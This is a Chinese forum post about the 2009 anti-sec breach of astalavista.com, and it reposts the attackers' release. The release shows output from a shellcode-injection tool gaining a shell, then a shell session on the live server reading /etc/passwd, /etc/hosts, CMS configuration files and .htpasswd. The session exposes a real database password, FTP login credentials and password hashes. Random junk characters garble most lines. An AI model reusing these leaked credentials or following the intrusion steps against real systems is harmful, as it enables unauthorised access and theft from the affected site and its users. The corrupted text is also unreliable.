里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。7 ?- n T5 @6 l8 v
# c% Q9 @( C% c# ?3 [6 v; Y( j[root@front3 ~]# curl -I litespeedtech.com
& n8 O# L5 g% PHTTP/1.1 200 OK
) i2 ~' n3 P" ZDate: Fri, 05 Jun 2009 22:54:51 GMT
5 w1 Y, j- j' z# A6 oServer: LiteSpeed
6 N! P, {& p: u
( \+ ^- L" x) I3 E9 C7 h4 ]. x另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
# X$ f( [( ?4 P# j- x7 K% l! }5 S8 C& w$ u5 E* z7 _
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。; J1 \% s9 `; U. K \! I
2 t; N ~; {6 N$ C
# s2 a+ P. I' f3 n3 o7 K/ B; ]/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ % T$ r$ A& a; n6 a: C2 R
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
: n- \, s4 h& u& G2 m. K' M- J/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \8 R$ ?1 E8 F! P& C
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
T& I" }7 J& t# Q( a, \- a \/ \/ \/ \/ \/ \/ \/
* @/ f; |5 q- m8 G5 \4 ^0 d" } The Hacking & Security Community
' Z4 l- v0 p. n& ~% s[+] Founded in 1997 by a hacker computer enthusiast
# {+ s" h+ W+ o) [. V[-] Exposed in 2009 by anti-sec group
8 I D6 ~6 J2 ]) I6 v' g% U
3 T, V2 V: E% A6 WFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
9 S0 A% z( x* }: ]>> 03. Who’s behind the site?% _/ ^1 w, H# C* A" Z$ `' Z
>>
. g& ?0 `$ Z1 w3 z/ P>> A team of security and IT professionals, and a countless number of contributors from all over the world.* D. ^5 t+ H. L) T3 @
. A7 H- `0 N3 ^; C' I
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
4 {* {9 c) }: l4 U$ C1 i>>
) X1 A0 l$ d, w" P4 @' \: Z>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and4 }0 ~# x% Z5 J7 e+ a( v
military institutions.
6 o4 w5 H0 Y; a3 u3 l% W9 b4 {& z h>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.7 }5 q5 c: M$ q9 I" N
/ R' t3 h Q6 Z% Z2 i2 G
Why has Astalavista been targeted?
6 X" `$ E5 `8 a+ `" ]7 e/ |
- S/ B8 R% ^2 M1 ]! W5 \. N/ POther than the fact that they are not doing any of this for the “community” but
( D; U) ]( e4 d4 {! I6 Sfor the money, they spread exploits for kids, claim to be a security community
" ^4 W5 R! ^# P o2 } |(with no real sense of security on their own servers), and they charge you $6.66
0 ]. E% L8 b% s- I4 P9 g- G Cper months to access a dead forum with a directory filled with public releases
: z7 Z e0 S! F+ jand outdated / broken services.8 e- [) i4 p% P8 x" @$ M
( w1 q: ~( m0 e( @6 R! HWe wanted to see how good that “team of security and IT professionals” really is.. f B$ Z! a/ Z
1 e( s6 Q. N- y* v$ ]: HLet’s begin.
& f- t! I8 |: n0 Z8 z
2 @* R- N4 i! z0 @* X% Oanti-sec:~# ./g0tshell astalavista.com -p 80: ^0 M9 S' k& Z3 r a- [
[+] Connecting to astalavista.com:80( P' _% D6 j: ~1 c+ r
[+] Grabbing banner…8 q; D. X* o/ W3 \
LiteSpeed
- }/ H0 V- H& @; J/ n5 ~3 M; J[+] Injecting shellcode…3 N# P! I3 e- F) q$ w! F* i. U
[-] Wait for it
, l( j7 D1 J1 o6 V; L
2 I0 I4 ]* v/ K! b0 S. U[~] We g0tshell: [* B n6 @! h3 B! I
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux: o" b$ ~* G2 t5 b( {" f7 Q
ID: uid=100(apache) gid=500(apache) groups=500(apache)
0 c+ K, X3 x2 k' i: T0 d7 A. x: f! x4 K/ {$ t- b
sh-3.2$ cat /etc/passwd
3 a4 C6 {5 {5 q5 S( h: R9 ^root:x:0:0:root:/root:/bin/bash
9 i% W) b/ {- kbin:x:1:1:bin:/bin:/sbin/nologin
7 ]3 C2 u9 ?. Q, F( fdaemon:x:2:2:daemon:/sbin:/sbin/nologin$ b0 e, X9 ]. Z* m1 a, l( _
adm:x:3:4:adm:/var/adm:/sbin/nologin
1 S. x! i+ T* r8 g" D$ m2 Ilp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
! h4 ~. a8 A3 q1 Lsync:x:5:0:sync:/sbin:/bin/sync; q, q6 _ e0 f3 j# m/ b: m
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown0 c2 l. ]0 o9 t1 F9 Z* H
halt:x:7:0:halt:/sbin:/sbin/halt
1 G1 Y3 D/ A# F8 t0 ~, [mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
3 b+ i- K) c z; |6 cnews:x:9:13:news:/etc/news:
. w3 P- `* j* \9 {6 a. G; Fuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
3 X# ^0 C; U+ o3 x5 aoperator:x:11:0 perator:/root:/sbin/nologin! L& t. O$ h# j- r2 @8 \
games:x:12:100:games:/usr/games:/sbin/nologin9 W, ]4 \7 K7 }/ K2 q
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
5 P1 _, I0 t1 b5 s# dftp:x:14:50:FTP User:/var/ftp:/sbin/nologin3 Y% R& ]9 d+ G, O3 S0 V
nobody:x:99:99:Nobody:/:/sbin/nologin0 }0 w8 G9 L* r" ]: A8 c
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
2 k% e3 R# g) h+ T0 ]# ?% xdbus:x:81:81:System message bus:/:/sbin/nologin5 c' L0 C! n7 o" N% [- o( {
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin7 ~! k7 h+ n% c; k$ [8 B
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin: d3 U# M$ |' c- @1 S
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
" g$ R3 ?" g3 A" |5 {7 K5 _+ ^. ?vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
, b' z) B# |7 a G- `. ohaldaemon:x:68:68:HAL daemon:/:/sbin/nologin% @6 @5 m. D' G+ p# T& {* @: C9 s
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin% ^/ P0 O2 @$ i+ I) Q
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
( b+ J- H5 s7 v+ O3 E7 z' M# E5 u9 Gnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin& W8 g+ s: _$ c: [! c% E& K
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin# L3 X- t4 L" \( o
pcap:x:77:77::/var/arpwatch:/sbin/nologin& ^: F* D2 Y+ g5 s7 P. b$ w/ ?
named:x:25:25:Named:/var/named:/sbin/nologin
+ d3 c9 B6 q9 ?; Zapache:x:100:500::/var/www:/bin/false
8 K& x& i; |% g/ _5 B# P% vdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
" L& Y M v u, i Smysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
" K: i+ _7 M' y/ Gwebapps:x:500:501::/var/www/html:/bin/bash
7 E/ w, h8 K k2 @- R9 k6 `majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash: o6 D* ?2 P$ @8 P7 a7 B5 @
admin:x:501:502::/home/admin:/bin/bash
) L" L+ P) n) @4 F" ljon:x:502:503::/home/jon:/bin/bash/ \% }( Y( @" f( D* s/ t
com:x:503:504::/home/com:/bin/bash& z( i+ H- f. }; D- F9 q3 J
ntp:x:38:38::/etc/ntp:/sbin/nologin! Y4 A6 Y$ Q5 O+ r2 v9 F2 \# `) U
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin1 j% Y* Q5 o$ s" W5 L1 A' w
astanet:x:504:505::/home/astanet:/bin/bash
" F: g* E0 @% w5 }1 javahi:x:70:70:Avahi daemon:/:/sbin/nologin6 P5 ~8 ^& ~3 ~+ L- k% r8 T+ J" V* D' S
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin' @+ s) D/ P! O) ~! j8 V( @
+ [! d1 Q3 M& l/ G! @% q( C C
sh-3.2$ cat /etc/hosts
. Z3 z' M4 j7 v+ y8 }# Do not remove the following line, or various programs" v1 U5 ]* f8 `. ?5 j. F
# that require network functionality will fail.
/ e- U+ v: u/ e* q5 | m5 z. |127.0.0.1 localhost.localdomain localhost- ]$ b- o: {9 ~2 r. k5 w j
::1 localhost6.localdomain6 localhost64 [6 h3 m+ Z) n8 [. I! N1 Q
80.74.154.172 asta1.astalavistaserver.com; |1 m7 Y7 s4 K$ J R8 |3 X
' J* [. F5 I% c- F: l/ E8 U3 {. s
sh-3.2$ pwd3 W0 ~6 g( f/ G" v: B! v3 h
/home/com/public_html
% A% }5 M! M B" M" S* y. m: P1 e1 g0 `3 v* l% U7 P" Z. `2 |& G
sh-3.2$ ls -la4 O% y' \0 ~: }! E: O; I
total 18460$ x6 d& m' a: Q+ L \7 e
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
3 ~- [2 K& b. O# l( L; bdrwx–x–x 11 com com 4096 Jun 25 2008 ..
3 A( [: l: Q, h6 t# Tdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
+ G8 j+ Q1 z( F+ c5 F: T+ F8 S: gdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
5 o# ^, }" q; z2 a) U7 jdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
! L+ u! b; t( o. R, e6 xdrwxrwxrwx 2 com com 4096 May 19 00:50 config
* _: z. ]% _& a; Odrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
4 @0 j; N/ ~; |' D, Xdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
U- k9 T8 f4 ?drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
2 ~$ R P/ m1 P: Y' z! H1 Mdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo% O2 I4 |) b, m3 J% m6 ]
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
& a" a8 K; p0 H# d' S$ J-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php3 w; e; u: C0 M" x& n$ }
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd& K! F( H% I$ u$ A$ u* l
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
6 K0 J) I! k$ c' \-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
~/ l" [1 B1 y4 _/ Edrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed9 L6 I9 u" X& p: @8 s
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess3 ~" l7 r; }5 o8 M9 x
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak6 z# e2 S E% ]' p4 T( Z
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
* `4 X' q! F) _drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool+ `+ u7 w) ? G) O* V
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images8 E6 {' P, Q* L7 c7 T2 v: G; d
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php" Z- L9 O g- x+ f& f6 w+ Q0 z" ]; K
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer, r# Z4 f6 M* _- k3 J% E- j" ^
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang( U' t0 P$ {8 V6 i5 u; _
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
% ^" C2 ] a- ]! Z0 @drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
' s: ~# z5 ]7 }& H7 A$ v2 xdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications0 D; ?/ t! D8 ^# C! h
drwxr-xr-x 34 com com 4096 May 28 16:30 modules& I) |2 i% N9 C9 V, z
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin) ~3 N% Y8 E3 N! b4 E
drwxrwxr-x 22 com com 4096 May 28 17:06 _new8 U' j( T) j1 I* d; ?6 j9 ~" v6 K
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
9 \( K0 H9 u, s& k3 jdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy$ m: S# X; Q! u
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy- k$ L8 W2 k8 F: r; L7 Q
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
4 x# I, j3 t1 e o/ C-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
: d1 {- k, E0 D8 z2 t-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
- A7 Q0 r) J; g1 n% P+ ?9 q% M3 edrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
" P9 c8 A3 A; d, U) y1 d) ?drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp L& v* S7 H" w& E; |* |
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
) ]8 G) D7 P( h- z( e4 n1 O
& j& G* {1 S# }8 s+ @5 |3 ush-3.2$ head -20 index.php+ @4 o5 Y( f( }( K
<?php2 ^5 I5 o/ F& N) N
: P: o O4 W5 }+ L; `; v/**
! z/ V3 S4 ^' l: ]6 x( ^, M- v* The main page for the CMS
- l+ B8 ~4 G2 O& ]; p* @copyright CONTREXX CMS - COMVATION AG; H+ }* C# Y* l& C- p
* @author Comvation Development Team
& W6 A! S# B) S% E* @version v1.0.9.10.1 stable
w0 E0 h( }+ t' ?! B. n/ K4 \* @package contrexx
9 y7 U+ k6 g) e7 Y* h* @subpackage core
: q7 x8 q( m2 q: R8 [* q* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage9 U. E/ n' d6 z: m6 x; w! n
* @since v0.0.0.0: B- i8 D; y$ \7 s# v; Z7 Q
* @todo Capitalize all class names in project
- @' N0 Q# F5 E$ `* @uses /config/configuration.php7 K9 S$ X# _4 t/ ^6 u4 G
* @uses /config/settings.php
9 ?7 r } X, h) k( O4 i9 f* @uses /config/version.php
0 U/ }. X; x, p4 V* @uses /core/API.php2 i: I! G+ P i8 D( { { H
* @uses /core_modules/cache/index.class.php3 v. r0 G# h1 E$ Q/ |4 y9 @% ^
* @uses /core/error.class.php
% L5 t3 x. l2 ]) Y: N6 ]! @* @uses /core_modules/banner/index.class.php- {) ~; [4 d- T, }0 m- ]" {5 B/ A) E, v
* @uses /core_modules/contact/index.class.php/ J; J2 u, G( E8 }$ i7 Y3 S
$ t# P2 q$ p) x3 Ysh-3.2$ cd config/6 c2 b' p5 |3 o& {
sh-3.2$ ls -la1 d9 P0 I, A; Q* E( l! P5 B
total 32
1 G8 T& E$ r/ y& R9 Pdrwxrwxrwx 2 com com 4096 May 19 00:50 .
& q4 R7 l) N; j8 P7 M- ydrwxr-xr-x 30 com apache 4096 May 28 17:06 ..( D7 R5 o# E& k) H( T# z
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php- [. r' E( B" |6 T# _6 S
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php& A7 G, A" Z6 o
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php/ s; l" G) e8 J7 P
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
) R- ?' G& [( t' t+ [/ i6 F2 B! H0 Y+ P( b2 z; f) O h
sh-3.2$ cat configuration.php
2 n7 i0 O5 w7 t0 d[snip]' Q! r x, r+ \) c g6 x0 f
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost; r. ^1 ]- V$ w
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
! h& o3 K. W7 e/ F$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
# C2 v% u1 I* u$ U0 j( }$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
+ I- v' _5 r, c5 i( ~1 |$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
* ^8 `1 H, D; G! `' k$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
( T; f$ P$ |1 K6 c! \- L& R, v& I$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..): x* u. w" M& r( ^! c
[snip]+ j3 E: U' G1 X4 P6 {
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
* ~9 f; M# `, ]& @, I1 f$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode6 e2 R) `( V( W" c7 @+ a
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
/ ]# d7 y: H- o$_FTPCONFIG['port'] = 21; // Ftp remote port
" ^7 }8 g( ]$ X2 j$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ G+ n2 \$ J& C7 z- s
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password! [6 y# M# \$ B/ q2 h. ^, y! R, h1 p
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms4 o, r0 ~2 |+ k5 K" `7 [; ~5 b+ W
) s3 h1 |4 X, S) ^3 Lsh-3.2$ cd ..* S$ L, b, V7 U3 e
sh-3.2$ cd dvd/
. c% r7 b" h4 D1 E/ I' csh-3.2$ ls -la
+ a! |' J' D* q# U2 T Q; z: B; Wtotal 2913780
3 C& u0 B3 \: h/ Gdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
# D( l9 B4 V' Vdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
6 K" g4 O. g1 \+ O7 P-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
4 a5 w& l$ ^! Z' [-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
7 |6 T$ j* F2 q6 l" H-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar) ~ u& L* {& T; w6 e
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess" c( G9 V: [; z# t1 i
( i# s/ v5 t% `2 E, f, N# C
sh-3.2$ cat .htaccess
7 N; m2 s, X: N6 w6 ?2 T) {, t$ NauthType Basic5 F& l" z! D4 ^3 R# q4 ]
authName DVD
6 G. r7 O& ?( D& TauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
; N9 {0 _& U- [) d9 y# j! {require valid-user
( q& q$ ]8 f, V7 [5 e
0 C s% k( \% {3 ]3 I2 K5 Ysh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd9 E C6 g3 z1 c+ K8 y$ l. X: b
DVDdownload:CRD8cuY6.MPT6
7 F4 t& N4 W* ?5 p6 Y. \DVDdownload2:CR8a36.wluFMg9 E' e( ~/ K! C5 w: ]
9 Z. o0 k- b! D- f1 qsh-3.2$ cat test.php- r* P+ C) T, o; ^8 o
<?php, y( j; n) ]& u3 m2 `$ {8 c
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
1 {/ N& I/ |% g- c5 R% p$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));% s" U2 a) r) ?& @( \/ t2 c% b
echo $url;, l0 x$ V6 _1 `4 `2 h, s
?>. Y, o1 b: W; n5 ~1 }
8 Y- G% F/ P% {; b
sh-3.2$ cd modifications/' W, v0 e! K- y3 Y1 t2 i9 u4 j
sh-3.2$ ls -la
' A5 K) Z$ V4 P S! w" htotal 32, a1 B6 @. q4 U0 C
drwxr-xr-x 8 com com 4096 May 11 12:48 .
+ Q9 L3 d8 M) N& i8 ?0 Sdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
8 {/ X" ~5 Y7 H N# kdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
4 m, n2 z* K' ^2 v3 ^, `6 `drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
1 O. l. d. G L, P' }, ]) m+ ydrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools. T# J5 r ~* q4 u
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
$ W/ T/ g. k0 k) m/ ndrwxr-xr-x 2 com com 4096 Feb 2 19:33 search7 c& w7 ~# i3 C# ?4 t
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp9 a, j7 M- r& m" v. m, `
9 A* C5 e% u4 g7 Bsh-3.2$ ls -R7 V) C# v6 x A' q* m
.:
# g; |6 w0 k8 x1 @7 H Tcom_avtng cronjobs onlinetools pjirc search _tmp
- f" {$ T$ a) I" E3 l& v1 f9 O. I3 ^- ~3 z. ?' l
./com_avtng:1 V6 B$ e; A2 m( `7 ^
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts8 c! u: k, t+ Z% p3 y
2 f5 \: H2 ?( h./com_avtng/scripts:$ d8 I; Q" V, h* q e
popunder.js
) d o1 S/ a7 ^1 E( o4 _8 x% O0 o& Q% a# H% B
./cronjobs:) N) N, y! N/ `' M8 n
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp# K, f" {; ~& { f' f
1 O8 J. g) U' ]: p
./cronjobs/tmp:5 S# x0 G. [# o+ i: {
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
% T) k b" L. o6 Z) }$ I2 ~0 ~9 B" ?" ^7 H8 u0 w/ ]$ b/ U
./onlinetools:$ \& l/ A: ~, o9 O; w5 x
index.php* P) v) E/ a7 E3 d
$ f- Y! U/ W' \" l0 q2 X
./pjirc:
/ g1 I, {) W' F+ k* q3 E. Aa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
4 m0 Q5 u# H7 CAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
7 h b1 L# z3 D. g! S7 Qbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd, f- S( B! M4 S. g8 a
. q; ~9 l3 I8 y: m( @5 f
./pjirc/img:
1 w8 ~/ k, j. h* @0 [" W! h* A) eange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif) E6 ~7 _( p) p$ j% i0 ^
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
9 k3 G$ D1 b- _! s- r6 D' Uverre-eau.gif( g9 w. X8 g# s+ Q" { Q t
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
6 |0 m$ p$ q$ |. ~) x: v! f8 Lverre-vin.gif* B/ t# C0 S6 N7 a: A# _
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif, d. D8 f" y# J2 c( E
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif8 b, P6 J: v; F( x) ~
5 T2 i' r3 l" y
./pjirc/snd:: X! y: j+ {, k- z- i. b
bell2.au ding.au$ J' O4 a3 p* H; a& s2 J" q/ B2 F
) I+ N \( ?; F) F$ v4 K
./search:8 R. Q: S! [# r5 y
searchEngines.php search.php
1 v3 N9 T( n$ \1 {0 g, L1 y# w; Q1 \; K9 U
./_tmp:
1 k* M$ z/ p0 g. w q: TdefaultPorts.php defaultPorts.txt6 l) e7 Q8 G( u' e, s5 m
4 ~3 \8 h6 A4 S; Y
sh-3.2$ cd cronjobs/8 r R9 q( _ o6 h
sh-3.2$ cat exploits.php
) d5 F* U" X. O+ T; t" }8 O0 u[snip]3 u. x, w& k. G9 n9 R
$categories = array();
. L6 f: ^, u& N$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
0 z+ J; K1 u1 ~ f# B6 D$expolits = file($milw0rmFile);
: M6 ?. I# v8 X: x9 Z# G- ~$comExploits = array();
' S$ K! y( l6 {[snip]. t+ p% [; J( B( p0 V' \; v
// manage data n' ^' Q% W+ N: C: x+ o
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
) W$ M% s5 q& |. Q4 P! I6 u# E& _9 N; T9 ?' J
// get path and title
- J6 k* e0 W! A9 w' q/ k8 j& Z $expolits[$x] = trim($expolits[$x]);
5 w& ^5 V. t9 v' C% j" \, H/ w $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));* v. |& _/ V, y9 E% w
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);3 q: O; P( s/ l. C! I: u' Q J1 {
, l* t6 O+ {" X' K // check if file exists, i/ ]5 C" V8 X* v( L3 f
if (file_exists($path)) {
7 z% I/ a+ s1 {2 L- u$ {" _) M- g% }# `- Y
$text = file_get_contents($path);
+ j5 h% r( Z, B' P
( H( i, J2 T9 n8 t( S, e // get content and date
2 j6 ^+ B7 t( J* @- o5 W9 r) W L$ ]# Q //$text = htmlspecialchars($text, ENT_QUOTES);
: D0 C4 n9 G) E! m" ]) l $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
6 Z1 p, t( V6 ^ if ($tmptext != ”) {
4 u0 H* D2 K% g% N $text = $tmptext;# Q1 ?7 Q9 A3 |+ L; c4 h/ n
} else {
; U3 M6 g4 M0 p8 p" r4 } $text = addslashes(htmlentities($text, ENT_QUOTES));
; k4 W4 ? P/ V- V0 j9 z9 d }' l# T% ~+ K; ?8 \. P) o% \' L
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
B. k% V) x. X2 P& C, K9 E" y $tmp = explode('-', $date);
7 a/ D6 l4 S$ Q \ $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));% ]8 u# f1 J) u
$cat = getCategory ($path);
u5 E, o; E* v5 B/ \: m1 T $ext = pathinfo(basename($path));
5 q5 n2 v, E+ s4 O $ext = $ext['extension'];# N# s! R$ p+ _# y0 F
$qStr = ”8 }. i" Z" `* M. @; b
SELECT `id`9 e/ s1 d: j- p$ L, u
FROM `contrexx_module_exploits`5 _8 n! H/ ^8 M
WHERE `title` = ‘” . $title . “‘4 }% B; ~, ]1 V$ k. D
AND `date` = ‘” . $date . “‘
1 V+ B3 s! D% g: u( ]# [ “;2 K6 ~5 ?+ L: Z7 o$ c# p/ M
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
$ w8 G2 x% |* L( U% Y $q = $_objDB->query($qStr);! V) T; A6 E4 a6 l4 @" R
) H& t' d Z, J$ Z2 \' ?% E if ($q->numRows() == 0) {# J7 i; d6 q4 @3 e# `" ]) \
1 w5 j. V# S2 p9 ~ B1 _6 |
// prepare array
& ^5 Q; P; m1 \* t7 L- g* B $comExploits[$x]['date'] = $date;! G# p+ {0 n2 c7 H5 G
$comExploits[$x]['title'] = $title;) {; S% u# N/ ^2 u
$comExploits[$x]['author'] = ‘milw0rm’;
# L% B3 l/ B: Y) o: g4 |' |! O $comExploits[$x]['text'] = $text;# R v# @: `5 A9 f
$comExploits[$x]['source'] = $ext;
, L: w( F! Z1 C2 P6 X $comExploits[$x]['url1'] = ”;* o1 e' ]0 H. F$ \, J$ R" i
$comExploits[$x]['url2'] = ”;8 [8 [- X$ U B9 Z- ~& Z# L; t( F! T: S
$comExploits[$x]['catid'] = $cat;
! q6 z q& t7 Z8 o6 q8 ? $comExploits[$x]['lang'] = ‘2′;% d* E( s' Y( o5 t
$comExploits[$x]['userid'] = ‘12′;
8 B8 h! D$ c4 [ $comExploits[$x]['startdate'] = ‘0000-00-00′;1 K+ ]% U) O* I3 g! l6 d
$comExploits[$x]['enddate'] = ‘0000-00-00′;
) S& K# k" a% s( \ $comExploits[$x]['status'] = ‘1′;8 t. u/ S! a: O: q C
$comExploits[$x]['changelog'] = $date;9 F8 K+ }' ^3 Q/ |
' q. z7 K; W* O+ c1 A3 _* l
}
5 g3 C: L7 V) g' I[snip]
& q: A' |0 ?8 v' A5 P. d" c $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>. l- \! o- _0 g
<rss version=”2.0″>+ g1 z/ t8 {* E$ a
<channel>
